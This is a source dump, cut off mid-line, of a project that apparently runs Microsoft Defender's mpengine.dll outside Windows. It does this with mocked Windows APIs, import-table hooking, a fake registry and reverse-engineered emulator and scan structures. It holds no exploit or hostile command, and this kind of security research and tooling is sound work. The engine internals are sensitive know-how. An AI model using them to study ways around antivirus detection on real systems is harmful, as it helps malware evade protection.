#pragma once 3 | #endif 4 | #ifndef _VERSION_H_ 5 | #define _VERSION_H_ 6 | 7 | #include 8 | #include 9 | #include "../exports.h" 10 | #include "../strutils.hpp" 11 | 12 | #if defined(__APPLE__) || defined(__LINUX__) 13 | #include "include/windows.h" 14 | #endif 15 | 16 | class MockVersion { 17 | public: 18 | function set_version_hookaddr = [](void) { 19 | APIExports::add_hook_info("version.dll", "GetFileVersionInfoSizeExW", (void*)GetFileVersionInfoSizeExW); 20 | APIExports::add_hook_info("version.dll", "GetFileVersionInfoExW", (void*)GetFileVersionInfoExW); 21 | APIExports::add_hook_info("version.dll", "VerQueryValueW", (void*)VerQueryValueW); 22 | 23 | }; 24 | #if defined(__WINDOWS__) 25 | static uint32_t __stdcall MockVersion::GetFileVersionInfoSizeExW(uint32_t dwFlags, char16_t* lptstrFilename, uint32_t* lpdwHandle); 26 | static bool __stdcall MockVersion::GetFileVersionInfoExW(uint32_t dwFlags, char16_t* lptstrFilename, uint32_t dwHandle, uint32_t dwLen, void* lpData); 27 | static bool __stdcall MockVersion::VerQueryValueW(void* pBlock, char16_t* lpSubBlock, void** lplpBuffer, uint32_t* puLen); 28 | #else 29 | static uint32_t __stdcall GetFileVersionInfoSizeExW(uint32_t dwFlags, char16_t* lptstrFilename, uint32_t* lpdwHandle); 30 | static bool __stdcall GetFileVersionInfoExW(uint32_t dwFlags, char16_t* lptstrFilename, uint32_t dwHandle, uint32_t dwLen, void* lpData); 31 | static bool __stdcall VerQueryValueW(void* pBlock, char16_t* lpSubBlock, void** lplpBuffer, uint32_t* puLen); 32 | #endif 33 | }; 34 | 35 | #endif // !_VERSION_H_ 36 | -------------------------------------------------------------------------------- /winapi/dlls/crypt32.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #ifndef _CRYPT32_H_ 5 | #define _CRYPT32_H_ 6 | #include 7 | #include "../exports.h" 8 | #include "../strutils.hpp" 9 | #if defined(__APPLE__) || defined(__LINUX__) 10 | #include "include/windows.h" 11 | #else 12 | #include 13 | #endif 14 | 15 | class MockCrypt32 { 16 | public: 17 | function set_crypt32_hookaddr = [](void) { 18 | APIExports::add_hook_info("crypt32.dll", "CertOpenStore", (void*)CertOpenStore); 19 | APIExports::add_hook_info("crypt32.dll", "CertCloseStore", (void*)CertCloseStore); 20 | APIExports::add_hook_info("crypt32.dll", "CertStrToNameW", (void*)CertStrToNameW); 21 | }; 22 | #if defined(__WINDOWS__) 23 | static void* __stdcall MockCrypt32::CertOpenStore(char* lpszStoreProvider, uint32_t dwMsgAndCertEncodingType, void* hCryptProv, uint32_t dwFlags, void* pvPara); 24 | static bool __stdcall MockCrypt32::CertCloseStore(void* hCertStore, uint32_t dwFlags); 25 | static bool __stdcall MockCrypt32::CertStrToNameW(uint32_t dwCertEncodingType, void* pszX500, uint32_t dwStrType, void* pvReserved, uint8_t* pbEncoded, uint32_t* pcbEncoded, void* ppszError); 26 | #else 27 | static void* __stdcall CertOpenStore(char* lpszStoreProvider, uint32_t dwMsgAndCertEncodingType, void* hCryptProv, uint32_t dwFlags, void* pvPara); 28 | static bool __stdcall CertCloseStore(void* hCertStore, uint32_t dwFlags); 29 | static bool __stdcall CertStrToNameW(uint32_t dwCertEncodingType, void* pszX500, uint32_t dwStrType, void* pvReserved, uint8_t* pbEncoded, uint32_t* pcbEncoded, void* ppszError); 30 | #endif 31 | 32 | }; 33 | #endif // !_CRYPT32_H_ 34 | -------------------------------------------------------------------------------- /winapi/dlls/bcrypt.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _BCRYPT_H_ 6 | #define _BCRYPT_H_ 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "../exports.h" 12 | #include "../strutils.hpp" 13 | 14 | #if defined(__APPLE__) || defined(__LINUX__) 15 | #include "include/windows.h" 16 | typedef uint32_t NTSTATUS; 17 | #endif 18 | 19 | 20 | class MockBcrypt { 21 | public: 22 | function set_bcrypt_hookaddr = [](void) { 23 | APIExports::add_hook_info("bcrypt.dll", "BCryptOpenAlgorithmProvider", (void*)BCryptOpenAlgorithmProvider); 24 | APIExports::add_hook_info("bcrypt.dll", "BCryptCloseAlgorithmProvider", (void*)BCryptCloseAlgorithmProvider); 25 | APIExports::add_hook_info("bcrypt.dll", "BCryptGenRandom", (void*)BCryptGenRandom); 26 | }; 27 | #if defined(__WINDOWS__) 28 | static NTSTATUS __stdcall MockBcrypt::BCryptOpenAlgorithmProvider(void* phAlgorithm, char16_t* pszAlgId, char16_t* pszImplementation, uint32_t dwFlags); 29 | static NTSTATUS __stdcall MockBcrypt::BCryptCloseAlgorithmProvider(void* hAlgorithm, uint32_t dwFlags); 30 | static NTSTATUS __stdcall MockBcrypt::BCryptGenRandom(void* phAlgorithm, uint8_t* pbBuffer, uint32_t cbBuffer, uint32_t dwFlags); 31 | #else 32 | static NTSTATUS __stdcall BCryptOpenAlgorithmProvider(void* phAlgorithm, char16_t* pszAlgId, char16_t* pszImplementation, uint32_t dwFlags); 33 | static NTSTATUS __stdcall BCryptCloseAlgorithmProvider(void* hAlgorithm, uint32_t dwFlags); 34 | static NTSTATUS __stdcall BCryptGenRandom(void* phAlgorithm, uint8_t* pbBuffer, uint32_t cbBuffer, uint32_t dwFlags); 35 | #endif 36 | }; 37 | #endif // !_BCRYPT_H_ 38 | -------------------------------------------------------------------------------- /mpcore/mpcore.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #ifndef _MPCORE_H_ 5 | #define _MPCORE_H_ 6 | #include 7 | #include "scanreply.h" 8 | typedef struct _pe_vars_t { 9 | SCAN_REPLY* pScanReply; 10 | void* unk1; 11 | char pe_signature[4]; 12 | /* 13 | v--------------unknown----------- 14 | */ 15 | }pe_vars_t; 16 | 17 | typedef struct _vdll_data_t32 { 18 | uint32_t vftable; 19 | uint32_t unk[0x1d]; 20 | uint32_t vdll_base; 21 | }vdll_data_t32; 22 | 23 | typedef struct _vdll_data_t64 { 24 | void* vftable; 25 | uint64_t unk[0x1c]; 26 | uint32_t vdll_base; 27 | }vdll_data_t64; 28 | 29 | typedef struct _IL_X64_Context { 30 | uint64_t* vftable; 31 | uint64_t rax; // 0x8 32 | uint64_t rbx; // 0x10 33 | uint64_t rcx; // 0x18 34 | uint64_t rdx; // 0x20 35 | uint64_t rsp; // 0x28 36 | uint64_t rbp; // 0x30 37 | uint64_t rsi; // 0x38 38 | uint64_t rdi; // 0x40 39 | uint64_t unk1[8]; // 0x48 40 | uint32_t sig1; // 0x88 41 | uint32_t sig2; // 0x8C 42 | uint32_t sig3; // 0x90 43 | uint32_t unk2; // 0x94 44 | void* callee; // 0x98 45 | uint32_t emu_eip; // 0xA0 46 | uint8_t unk3[0x1384]; //0xA4 47 | uint64_t mp_stack_base; 48 | uint64_t stack_base; 49 | /* 50 | v--------------unknown----------- 51 | */ 52 | 53 | }IL_X64_Context, *PIL_X64_Context; 54 | 55 | typedef struct _IL_X86_Context { 56 | uint32_t* vftable; //0x0 57 | uint32_t reserved; //0x4 58 | uint32_t eax; //0x8 59 | uint32_t ebx; //0xC 60 | uint32_t ecx; //0x10 61 | uint32_t edx; //0x14 62 | uint32_t esp; //0x18 63 | uint32_t ebp; //0x1C 64 | uint32_t esi; //0x20 65 | uint32_t edi; //0x24 66 | uint32_t sig1; //0x28 67 | uint32_t sig2; //0x2C 68 | uint32_t sig3; //0x30 69 | void* callee; //0x34 70 | uint32_t unk1; //0x38 71 | uint32_t emu_eip; //0x3C 72 | uint32_t unk2[0x4FA]; // 0x40 ~ 0x1424 73 | uint32_t mp_stack_base; //0x1428 74 | uint32_t reserved2; 75 | uint32_t stack_base; //0x1430 76 | uint32_t reserved3; 77 | /* 78 | v--------------unknown----------- 79 | */ 80 | }IL_X86_Context, *PIL_X86_Context; 81 | #endif // !_MPCORE_H_ 82 | 83 | -------------------------------------------------------------------------------- /winapi/dlls/ole32.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef _OLE32_H_ 3 | #define _OLE32_H_ 4 | #include "../exports.h" 5 | #include "../strutils.hpp" 6 | class MockOle32 { 7 | public: 8 | function set_ole32_hookaddr = [](void) { 9 | 10 | APIExports::add_hook_info("ole32.dll", "CoCreateGuid", (void*)CoCreateGuid); 11 | APIExports::add_hook_info("ole32.dll", "CoCreateInstance", (void*)CoCreateInstance); 12 | APIExports::add_hook_info("ole32.dll", "CoInitializeEx", (void*)CoInitializeEx); 13 | APIExports::add_hook_info("ole32.dll", "CoUninitialize", (void*)CoUninitialize); 14 | APIExports::add_hook_info("ole32.dll", "IIDFromString", (void*)IIDFromString); 15 | APIExports::add_hook_info("ole32.dll", "CoSetProxyBlanket", (void*)CoSetProxyBlanket); 16 | 17 | }; 18 | #if defined(__WINDOWS__) 19 | static uint32_t __stdcall MockOle32::CoCreateGuid(void *pguid); 20 | static uint32_t __stdcall MockOle32::CoCreateInstance(void* rclsid, void* pUnkOuter, uint32_t dwClsContext, void* riid, void* ppv); 21 | static uint32_t __stdcall MockOle32::CoInitializeEx(void* pvReserved, uint32_t dwCoInit); 22 | static void __stdcall MockOle32::CoUninitialize(); 23 | static uint32_t __stdcall MockOle32::IIDFromString(void* lpsz, void* lpiid); 24 | static uint32_t __stdcall MockOle32::CoSetProxyBlanket( 25 | void* pProxy, 26 | uint32_t dwAuthnSvc, 27 | uint32_t dwAuthzSvc, 28 | char16_t* pServerPrincName, 29 | uint32_t dwAuthnLevel, 30 | uint32_t dwImpLevel, 31 | void* pAuthInfo, 32 | uint32_t dwCapabilities 33 | ); 34 | #else 35 | static uint32_t __stdcall CoCreateGuid(void *pguid); 36 | static uint32_t __stdcall CoCreateInstance(void* rclsid, void* pUnkOuter, uint32_t dwClsContext, void* riid, void* ppv); 37 | static uint32_t __stdcall CoInitializeEx(void* pvReserved, uint32_t dwCoInit); 38 | static void __stdcall CoUninitialize(); 39 | static uint32_t __stdcall IIDFromString(void* lpsz, void* lpiid); 40 | static uint32_t __stdcall CoSetProxyBlanket( 41 | void* pProxy, 42 | uint32_t dwAuthnSvc, 43 | uint32_t dwAuthzSvc, 44 | char16_t* pServerPrincName, 45 | uint32_t dwAuthnLevel, 46 | uint32_t dwImpLevel, 47 | void* pAuthInfo, 48 | uint32_t dwCapabilities 49 | ); 50 | #endif // 51 | 52 | }; 53 | #endif // _OLE32_H_ 54 | -------------------------------------------------------------------------------- /mpcore/openscan.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #ifndef __OPENSCAN_H 5 | #define __OPENSCAN_H 6 | 7 | 8 | #if defined(__WINDOWS__) 9 | #include 10 | #else 11 | typedef struct _GUID { 12 | uint32_t Data1; 13 | uint16_t Data2; 14 | uint16_t Data3; 15 | uint8_t Data4[8]; 16 | } GUID; 17 | #endif 18 | 19 | 20 | #define OPENSCAN_VERSION 0x2C6D 21 | 22 | 23 | enum { 24 | SCANSOURCE_NOTASOURCE = 0, 25 | SCANSOURCE_SCHEDULED = 1, 26 | SCANSOURCE_ONDEMAND = 2, 27 | SCANSOURCE_RTP = 3, 28 | SCANSOURCE_IOAV_WEB = 4, 29 | SCANSOURCE_IOAV_FILE = 5, 30 | SCANSOURCE_CLEAN = 6, 31 | SCANSOURCE_UCL = 7, 32 | SCANSOURCE_RTSIG = 8, 33 | SCANSOURCE_SPYNETREQUEST = 9, 34 | SCANSOURCE_INFECTIONRESCAN = 0x0A, 35 | SCANSOURCE_CACHE = 0x0B, 36 | SCANSOURCE_UNK_TELEMETRY = 0x0C, 37 | SCANSOURCE_IEPROTECT = 0x0D, 38 | SCANSOURCE_ELAM = 0x0E, 39 | SCANSOURCE_LOCAL_ATTESTATION = 0x0F, 40 | SCANSOURCE_REMOTE_ATTESTATION = 0x10, 41 | SCANSOURCE_HEARTBEAT = 0x11, 42 | SCANSOURCE_MAINTENANCE = 0x12, 43 | SCANSOURCE_MPUT = 0x13, 44 | SCANSOURCE_AMSI = 0x14, 45 | SCANSOURCE_STARTUP = 0x15, 46 | SCANSOURCE_ADDITIONAL_ACTIONS = 0x16, 47 | SCANSOURCE_AMSI_UAC = 0x17, 48 | SCANSOURCE_GENSTREAM = 0x18, 49 | SCANSOURCE_REPORTLOWFI = 0x19, 50 | SCANSOURCE_REPORTINTERNALDETECTION = 0x19, 51 | SCANSOURCE_SENSE = 0x1A, 52 | SCANSOURCE_XBAC = 0x1B, 53 | }; 54 | #ifdef _X86 55 | typedef struct _OPENSCAN_PARAMS { 56 | uint32_t Version; 57 | uint32_t ScanSource; 58 | uint32_t Flags; 59 | uint32_t field_C; 60 | uint32_t field_10; 61 | uint32_t field_14; 62 | uint32_t field_18; 63 | uint32_t field_1C; 64 | GUID ScanID; 65 | uint32_t field_30; 66 | uint32_t field_34; 67 | uint32_t field_38; 68 | uint32_t field_3C; 69 | uint32_t field_40; 70 | uint32_t field_44; 71 | } OPENSCAN_PARAMS, *POPENSCAN_PARAMS; 72 | #elif _X64 73 | typedef struct _OPENSCAN_PARAMS { 74 | uint64_t Version; 75 | uint64_t ScanSource; 76 | uint64_t Flags; 77 | uint64_t field_C; 78 | uint64_t field_10; 79 | uint64_t field_14; 80 | uint64_t field_18; 81 | uint64_t field_1C; 82 | GUID ScanID; 83 | uint64_t field_30; 84 | uint64_t field_34; 85 | uint64_t field_38; 86 | uint64_t field_3C; 87 | uint64_t field_40; 88 | uint64_t field_44; 89 | } OPENSCAN_PARAMS, *POPENSCAN_PARAMS; 90 | #endif 91 | 92 | #pragma pack(pop) 93 | #endif // __OPENSCAN_H 94 | -------------------------------------------------------------------------------- /winapi/ntoskrnl.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NTOSKRNL_H_ 3 | #define _NTOSKRNL_H_ 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "../include/jsoncpp/json/json.h" 9 | #include "strutils.hpp" 10 | using namespace std; 11 | 12 | class MockNTKrnl { 13 | public: 14 | static uint16_t major; 15 | static uint16_t minor; 16 | static uint32_t build_version; 17 | static uint64_t engine_base; 18 | //static int errcode; 19 | static map m_env_variable; 20 | static map> m_reg_handle; //hKey is void* 21 | static map 30 | > 31 | >m_heap_handle; 32 | static uint32_t process_heap_handle; 33 | static Json::Value mock_reg; 34 | static uint64_t handle_count; 35 | static uint32_t page_alignment; 36 | 37 | #ifdef _WIN64 38 | string mock_reg_path = ".\\reg\\mock_reg.json"; 39 | #else 40 | string mock_reg_path = "./reg/mock_reg.json"; 41 | #endif // _WIN64 42 | MockNTKrnl() { 43 | this->parse_mock_reg_info(); 44 | } 45 | #if defined(__WINDOWS__) 46 | static uint64_t MockNTKrnl::CreateNewRegHandle(string hive, string key, Json::Value v); 47 | static void MockNTKrnl::RemoveRegHandle(uint32_t hKey); 48 | static uint64_t MockNTKrnl::CreateNewHeapHandle(size_t init_sz, size_t max_sz); 49 | static void* MockNTKrnl::AllocHeapMemory(uint64_t heap_handle, bool zeroize, size_t mem_size); 50 | static void* MockNTKrnl::ResizeHeap(uint64_t heap_handle, bool zeroize, void* heap_base, size_t mem_size); 51 | static bool MockNTKrnl::FreeHeap(uint64_t heap_handle, void* heap_base); 52 | static bool MockNTKrnl::DestroyHeap(uint64_t heap_handle); 53 | #else 54 | static uint64_t CreateNewRegHandle(string hive, string key, Json::Value v); 55 | static void RemoveRegHandle(uint32_t hKey); 56 | static uint64_t CreateNewHeapHandle(size_t init_sz, size_t max_sz); 57 | static void* AllocHeapMemory(uint64_t heap_handle, bool zeroize, size_t mem_size); 58 | static void* ResizeHeap(uint64_t heap_handle, bool zeroize, void* heap_base, size_t mem_size); 59 | static bool FreeHeap(uint64_t heap_handle, void* heap_base); 60 | static bool DestroyHeap(uint64_t heap_handle); 61 | #endif 62 | 63 | private: 64 | #if defined(__WINDOWS__) 65 | void MockNTKrnl::parse_mock_reg_info(); 66 | #else 67 | void parse_mock_reg_info(); 68 | #endif 69 | 70 | }; 71 | #endif // !_NTOSKRNL_H_ 72 | 73 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | ############################################################################### 6 | # Set default behavior for command prompt diff. 7 | # 8 | # This is need for earlier builds of msysgit that does not have it on by 9 | # default for csharp files. 10 | # Note: This is only used by command line 11 | ############################################################################### 12 | #*.cs diff=csharp 13 | ############################################################################### 14 | # Set the merge driver for project and solution files 15 | # 16 | # Merging from the command prompt will add diff markers to the files if there 17 | # are conflicts (Merging from VS is not affected by the settings below, in VS 18 | # the diff markers are never inserted). Diff markers may cause the following 19 | # file extensions to fail to load in VS. An alternative would be to treat 20 | # these files as binary and thus will always conflict and require user 21 | # intervention with every merge. To do so, just uncomment the entries below 22 | ############################################################################### 23 | #*.sln merge=binary 24 | #*.csproj merge=binary 25 | #*.vbproj merge=binary 26 | #*.vcxproj merge=binary 27 | #*.vcproj merge=binary 28 | #*.dbproj merge=binary 29 | #*.fsproj merge=binary 30 | #*.lsproj merge=binary 31 | #*.wixproj merge=binary 32 | #*.modelproj merge=binary 33 | #*.sqlproj merge=binary 34 | #*.wwaproj merge=binary 35 | ############################################################################### 36 | # behavior for image files 37 | # 38 | # image files are treated as binary by default. 39 | ############################################################################### 40 | #*.jpg binary 41 | #*.png binary 42 | #*.gif binary 43 | ############################################################################### 44 | # diff behavior for common document formats 45 | # 46 | # Convert binary document formats to text before diffing them. This feature 47 | # is only available from the command line. Turn it on by uncommenting the 48 | # entries below. 49 | ############################################################################### 50 | #*.doc diff=astextplain 51 | #*.DOC diff=astextplain 52 | #*.docx diff=astextplain 53 | #*.DOCX diff=astextplain 54 | #*.dot diff=astextplain 55 | #*.DOT diff=astextplain 56 | #*.pdf diff=astextplain 57 | #*.PDF diff=astextplain 58 | #*.rtf diff=astextplain 59 | #*.RTF diff=astextplain 60 | *.psd filter=lfs diff=lfs merge=lfs -text 61 | -------------------------------------------------------------------------------- /main.cpp: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma warning(disable: 4996) 3 | #endif 4 | 5 | #include 6 | #include 7 | #include 8 | #if defined(__WINDOWS__) || defined(__LINUX__) 9 | #include 10 | #elif defined(__APPLE__) 11 | #include 12 | #include 13 | #endif 14 | #include 15 | #include "loader.hpp" 16 | #include "log.hpp" 17 | #include "mpcore/engineboot.h" 18 | #include "mpcore/mpcore.h" 19 | #include "mpcore/openscan.h" 20 | #include "mpcore/rsignal.h" 21 | #include "mpcore/scanreply.h" 22 | #include "mpcore/streambuffer.h" 23 | #include "wrapper.hpp" 24 | #include "winapi/imports.h" 25 | #include "winapi/ntoskrnl.h" 26 | 27 | #if defined(__WINDOWS__) 28 | #ifndef open 29 | #define open _open 30 | #endif // !open 31 | #endif 32 | 33 | using namespace std; 34 | string engine_path; 35 | void* engine_base = nullptr; 36 | 37 | int main(int argc, char** argv) { 38 | int fd = 0; 39 | char cur_dir[260]; 40 | string cmdline; 41 | ImportDLLs* dlls; 42 | MockNTKrnl mtosknl; 43 | 44 | if (argc < 2) 45 | console_log(MSGTYPE::CRIT, "Please input target file"); 46 | 47 | for (int i = 0; argc - 1 > i; i++) 48 | cmdline += string(argv[i]) + string(" ") + string(argv[i + 1]); 49 | #if defined(__WINDOWS__) 50 | GetCurrentDirectory( 51 | MAX_PATH, 52 | cur_dir 53 | ); 54 | engine_path = string(cur_dir) + "\\engine\\mpengine.dll"; 55 | #else 56 | getcwd(cur_dir, sizeof(cur_dir)); 57 | engine_path = string(cur_dir) + "/engine/mpengine.dll"; 58 | #endif 59 | 60 | engine_base = of_loadlibraryX64(engine_path); 61 | MockNTKrnl::engine_base = (uint64_t)engine_base; 62 | MockKernel32::commandline = cmdline; 63 | MockKernel32::wcommandline.assign(cmdline.begin(), cmdline.end()); 64 | if (!engine_base) { 65 | console_log(MSGTYPE::CRIT, "Unable to load mpengine.dll"); 66 | } 67 | 68 | dlls = new ImportDLLs(engine_base); 69 | dlls->set_ported_apis(); 70 | bool res = call_dllmain(engine_base); 71 | void* rsig_addr = (void*)of_getprocaddress(engine_base, (char*)"__rsignal"); 72 | 73 | //engine_base = LoadLibrary(engine_path.c_str()); 74 | //void* rsig_addr = (void*)GetProcAddress((HMODULE)engine_base, "__rsignal"); 75 | #if defined(__WINDOWS__) 76 | fd = open((char*)argv[1], _O_BINARY | _O_RDONLY, _S_IREAD); 77 | #else 78 | fd = open((char*)argv[1], O_RDONLY, S_IREAD); 79 | #endif 80 | if (fd < 0) { 81 | console_log(MSGTYPE::ERR, "Fail to open file"); 82 | exit(-1); 83 | } 84 | 85 | RsignalWrapper* rsignal_wrapper; 86 | rsignal_wrapper = new RsignalWrapper(); 87 | rsignal_wrapper->set_notify_cb((void*)FullScanNotifyCallback); 88 | rsignal_wrapper->set_rsignal(rsig_addr); 89 | rsignal_wrapper->set_vdm_location(string(cur_dir) + "/engine"); 90 | rsignal_wrapper->rsig_boot_engine(); 91 | rsignal_wrapper->rsig_scan_stream(fd); 92 | 93 | console_log(MSGTYPE::INFO, "bye~!"); 94 | } 95 | -------------------------------------------------------------------------------- /winapi/exports.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "exports.h" 3 | 4 | map> APIExports::exports; 5 | void APIExports::add_hook_info(string mod_name, string func_name, void* addr) { 6 | if (APIExports::exports.count(mod_name)) { 7 | if (!APIExports::exports[mod_name].count(func_name)) { 8 | APIExports::exports[mod_name][func_name] = addr; 9 | } 10 | } 11 | else { 12 | APIExports::exports[mod_name]; 13 | APIExports::exports[mod_name][func_name] = addr; 14 | } 15 | } 16 | 17 | bool APIExports::hook_as_ported_api(void* imgbase, char* targ_module, char* targ_api, void* hook_addr) { 18 | uint16_t platform = 0xffff; 19 | uint8_t* _imgbase = (uint8_t*)imgbase; 20 | uint32_t imp_dir_va; 21 | uint32_t imp_dir_sz; 22 | 23 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)_imgbase; 24 | IMAGE_IMPORT_DESCRIPTOR* imp_descriptor = nullptr; 25 | 26 | IMAGE_NT_HEADERS64* nt_header = (IMAGE_NT_HEADERS64*)(_imgbase + dos_header->e_lfanew); 27 | IMAGE_THUNK_DATA64* name_tab = nullptr; 28 | IMAGE_THUNK_DATA64* addr_tab = nullptr; 29 | 30 | imp_dir_va = nt_header->OptionalHeader.DataDirectory[1].VirtualAddress; 31 | imp_dir_sz = nt_header->OptionalHeader.DataDirectory[1].Size; 32 | imp_descriptor = (IMAGE_IMPORT_DESCRIPTOR*)(_imgbase + imp_dir_va); 33 | char* mod_name = nullptr; 34 | if (imp_dir_sz) { 35 | while (imp_descriptor->Name) { 36 | mod_name = (char*)(_imgbase + imp_descriptor->Name); 37 | #if defined(__WINDOWS__) 38 | if (_stricmp(targ_module, mod_name) != 0) { 39 | #else 40 | if (strcasecmp(targ_module, mod_name) != 0) { 41 | #endif 42 | imp_descriptor++; 43 | continue; 44 | } 45 | #if defined(__WINDOWS__) 46 | uint64_t* pThunkRef = reinterpret_cast(_imgbase + imp_descriptor->OriginalFirstThunk); 47 | #else 48 | uint64_t* pThunkRef = reinterpret_cast(_imgbase + imp_descriptor->DUMMYUNIONNAME.OriginalFirstThunk); 49 | #endif 50 | uint64_t* pFuncRef = reinterpret_cast(_imgbase + imp_descriptor->FirstThunk); 51 | if (!pThunkRef) 52 | pThunkRef = pFuncRef; 53 | for (; *pThunkRef; pThunkRef++, pFuncRef++) { 54 | IMAGE_IMPORT_BY_NAME* imp_by_name = (IMAGE_IMPORT_BY_NAME*)(_imgbase + *pThunkRef); 55 | if (strcmp((const char*)imp_by_name->Name, (const char*)targ_api) == 0) { 56 | *pFuncRef = (uint64_t)hook_addr; 57 | return true; 58 | } 59 | } 60 | imp_descriptor++; 61 | } 62 | } 63 | return false; 64 | } 65 | 66 | void APIExports::hook_api_bulk(void* image_base) { 67 | auto iter = APIExports::exports.begin(); 68 | for (auto const& mod_name : APIExports::exports) { 69 | for (auto const& proc_name : APIExports::exports[mod_name.first]) { 70 | APIExports::hook_as_ported_api( 71 | image_base, 72 | (char*)mod_name.first.c_str(), 73 | (char*)proc_name.first.c_str(), 74 | (void*)proc_name.second 75 | ); 76 | } 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /reg/mock_reg.json: -------------------------------------------------------------------------------- 1 | { 2 | "hklm": { 3 | "software": { 4 | "policies": { 5 | "microsoft": { 6 | "windows advanced threat protection": { 7 | 8 | }, 9 | "windows defender": { 10 | 11 | } 12 | } 13 | }, 14 | "microsoft": { 15 | "windows": { 16 | "currentversion": { 17 | "commonfilesdir": "C:\\Program Files\\Common Files", 18 | "programfilespath": "%ProgramFiles%", 19 | "programfilesdir": "C:\\Program Files", 20 | "explorer": { 21 | "shell folders": { 22 | "common desktop": "C:\\Users\\Public\\Desktop", 23 | "common appdata": "C:\\ProgramData" 24 | }, 25 | "user shell folders": { 26 | "common appdata": "%ProgramData%", 27 | "common documents": "%PUBLIC%\\Documents", 28 | "backup": { 29 | "appdata": "%USERPROFILE%\\AppData\\Roaming", 30 | "desktop": "%USERPROFILE%\\Desktop" 31 | } 32 | } 33 | } 34 | }, 35 | "appmodelunlock": { 36 | "(default)": "" 37 | } 38 | }, 39 | "windows nt": { 40 | "currentversion": { 41 | "installtime": 132611518302062034, 42 | "ubr": 544, 43 | "buildbranch": "vb_release", 44 | "profilelist": { 45 | "s-1-5-18": { 46 | "flags": 12, 47 | "refcount": 1, 48 | "sid": 1001, 49 | "state": 0 50 | }, 51 | "s-1-5-19": { 52 | "flags": 0, 53 | "state": 0 54 | }, 55 | "s-1-5-20": { 56 | "flags": 0, 57 | "state": 0 58 | }, 59 | "s-1-5-21-3826975614-3287876503-4250936272-1001": { 60 | "flags": 0, 61 | "fullprofile": 1, 62 | "profileimagepath": "C:\\Users\\orca", 63 | "sid": 1000 64 | } 65 | } 66 | } 67 | }, 68 | "windowsruntime": { 69 | "activatableclassid": { 70 | "Windows.Management.Deployment.PackageManager": { 71 | 72 | } 73 | } 74 | }, 75 | "windows defender": { 76 | "features": { 77 | 78 | } 79 | }, 80 | "windows advanced threat protection": { 81 | 82 | } 83 | } 84 | }, 85 | "system": { 86 | "currentcontrolset": { 87 | "control": { 88 | "session manager": { 89 | "environment": { 90 | "os": "Windows_NT", 91 | "number_of_processors": "8", 92 | "processor_architecture": "amd64", 93 | "processor_identifier": "Intel64 Family 6 Model 142 Stepping 11, GenuineIntel", 94 | "processor_level": "6", 95 | "processor_revision": "36363", 96 | "windir": "%SystemRoot%", 97 | "username": "SYSTEM" 98 | } 99 | }, 100 | "hivelist":{ 101 | "\\registry\\machine\\system" : "\\Device\\HarddiskVolume3\\Windows\\System32\\config\\SYSTEM", 102 | "\\registry\\machine\\security" : "\\Device\\HarddiskVolume3\\Windows\\System32\\config\\SECURITY", 103 | "\\registry\\machine\\hardware" : "", 104 | } 105 | } 106 | } 107 | } 108 | } 109 | } -------------------------------------------------------------------------------- /mac-defender.xcodeproj/xcshareddata/xcschemes/mac-defender.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 44 | 46 | 52 | 53 | 54 | 55 | 58 | 59 | 60 | 61 | 65 | 66 | 67 | 68 | 74 | 76 | 82 | 83 | 84 | 85 | 87 | 88 | 91 | 92 | 93 | -------------------------------------------------------------------------------- /winapi/strutils.cpp: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma warning(disable: 4996) 3 | #endif 4 | #include "strutils.hpp" 5 | 6 | char* convert_wstr_to_str(char16_t* wstr){ 7 | u16string u16_str = u16string(wstr); // for *unix based system compatibility 8 | string std_str; 9 | std_str.assign(u16_str.begin(), u16_str.end()); 10 | char* new_str = new char[std_str.length() + 1]; 11 | strcpy(new_str, std_str.c_str()); 12 | 13 | return new_str; 14 | } 15 | 16 | char16_t* convert_str_to_wstr(char* str) { 17 | string std_str = string(str); 18 | u16string std_wstr; 19 | std_wstr.assign(std_str.begin(), std_str.end()); 20 | char16_t* new_wstr = new char16_t[std_wstr.length() + 1]; 21 | uint64_t max_len = (std_str.length() + 1) * sizeof(char16_t); 22 | memmove(new_wstr, std_wstr.c_str(), max_len); 23 | 24 | return new_wstr; 25 | } 26 | 27 | char* convert_winpath_to_unixpath(char* winpath) { 28 | while (strchr(winpath, '\\')) 29 | *strchr(winpath, '\\') = '/'; 30 | return winpath; 31 | } 32 | 33 | char* convert_unixpath_to_winpath(char* unixpath) { 34 | while (strchr(unixpath, '/')) 35 | *strchr(unixpath, '/') = '\\'; 36 | return unixpath; 37 | } 38 | 39 | char* str_tolower(char* str) { 40 | for (char *t = str; *t; t++) 41 | *t = tolower(*t); 42 | return str; 43 | } 44 | 45 | char* read_multibyte(void* ptr, size_t buf_sz) { 46 | char* _str = (char*)ptr; 47 | char* new_str = nullptr; 48 | size_t l = 0; 49 | if (buf_sz != 0) 50 | for (; (_str[l] != '\0' && buf_sz > l); l++); 51 | else 52 | for (; (_str[l] != '\0'); l++); 53 | new_str = new char[l + 1]; 54 | memset(new_str, 0, (l + 1) * sizeof(char)); 55 | memmove(new_str, _str, l); 56 | 57 | return new_str; 58 | } 59 | 60 | char16_t* read_widestring(void* ptr, size_t buf_sz) { 61 | char16_t* _str = (char16_t*)ptr; 62 | uint8_t* new_str = nullptr; 63 | size_t l = 0; 64 | if (buf_sz != 0) 65 | for (; (_str[l] != '\0' && buf_sz > l); l++); 66 | else 67 | for (; (_str[l] != '\0'); l++); 68 | l = l * 